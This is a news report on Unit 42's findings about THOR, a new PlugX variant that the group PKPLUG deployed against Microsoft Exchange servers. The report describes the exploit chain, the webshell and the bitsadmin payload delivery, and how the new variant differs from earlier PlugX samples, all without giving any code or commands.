A cyberespionage group linked by researchers to the Chinese government deployed a never-before-seen variant of the PlugX implant during attacks targeting Microsoft Exchange servers earlier this year, according to Palo Alto Networks' Unit 42 threat intelligence team.
The variant observed by Unit 42 contained a change to its core source code: the replacement of its trademark word “PLUG” to “THOR,” as well as new functionality, such as enhanced payload-delivery mechanisms and abuse of trusted binaries. The new PlugX variant was delivered as a post-exploitation tool to one of the breached Exchange servers.
Unit 42 tracks the threat actor behind this attack as PKPLUG (otherwise known as Mustang Panda). In the observed attacks the malicious actor exploited a chain of zero-day vulnerabilities (CVE-2021-26855 and CVE-2021-27065) to upload a webshell to publicly accessible web directory, allowing code execution at the highest privilege level.
The attackers then used a technique known as “living off the land,” which uses trusted binaries to bypass antivirus detection, in this case it was the Microsoft Windows binary bitsadmin.exe, which hackers used to download file named Aro.dat from a GitHub repository. This file was an encrypted and compressed PlugX payload.
“Once the decrypted payload runs in memory, it exhibits the same behaviors as previous PlugX implant variants. It starts by decrypting the embedded PlugX hardcoded configuration settings. The decryption algorithm and XOR keys are fairly consistent across multiple PlugX implants,” the researchers said.
“One noticeable difference with this sample compared to all the other known PlugX malware families is the magic number check performed during the initialization of the PlugX plugins. Historically, that number has always been 0x504C5547, which corresponds to the PLUG value in ASCII encoding. In this sample, the magic number is 0x54484F52, corresponding to the THOR value in ASCII encoding.”
The latest version of PlugX has a variety of plug-ins that "provide attackers various capabilities to monitor, update and interact with the compromised system to fulfil their objectives."
The Unit 42 research team linked THOR to PKPLUG based on overlaps of related infrastructure and common malicious behaviors detected among other recently discovered PlugX samples.